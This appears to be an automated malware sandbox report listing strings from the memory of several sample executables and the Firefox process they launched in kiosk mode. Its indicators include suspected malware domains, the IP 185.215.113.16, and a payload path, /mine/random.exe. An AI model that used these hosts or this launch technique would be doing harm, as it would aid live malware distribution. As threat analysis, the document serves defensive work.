Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: am Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:? equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: browser.fixup.domainsuffixwhitelist.Failed to listen. Listener already attached.@mozilla.org/network/protocol;1?name=default{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}^[a-z0-9-]+(\.[a-z0-9-]+):[0-9]{1,5}([/?#]\|$)devtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderresource://devtools/shared/security/socket.jsUnable to start devtools server on WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAG_FORCE_ALTERNATE_URIdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?DevTools telemetry entry point failed: devtools.debugger.remote-websocketdevtools.performance.recording.ui-base-urlFailed to listen. Callback argument missing.No callback set for this channel.^([a-z+.-]+:\/{0,3})*([^\/@]+@).+devtools.performance.popup.feature-flag@mozilla.org/dom/slow-script-debug;1@mozilla.org/uriloader/handler-service;1get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIJSON Viewer's onSave failed in startPersistenceresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjshttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededisDownloadsImprovementsAlreadyMigrated@mozilla.org/network/async-stream-copier;1https://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.yahoo.co.jp/compose/?To=%sScheme should be either http or httpsresource://gre/modules/JSONFile.sys.mjsgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst argument should be an nsIInputStreamhttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALID
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000002.2872503663.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/videoCS_removeLogEventListenerbrowsing-context-discardedPREF_BRANCH_WAS_REGISTEREDIDB_MIGRATE_RESULT_HISTOGRAM equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/video`^U equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.comZ equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000003.2836170550.0000000000854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: illa Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.2839804513.000001E3C87AD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2844813161.000001E3C87B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: osk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2846485551.000001E3C8A74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2843256720.000001E3C8A73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s--kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationUser equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: webIsolated=https://facebook.comhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com_ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2995380035.000001E7639A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763C32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net

Source: unknown

Source: firefox.exe, 0000001D.00000002.2983794051.000001E7627A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/9
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/=C
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/R
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/U
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/_
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/c
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/g
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/k
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeL
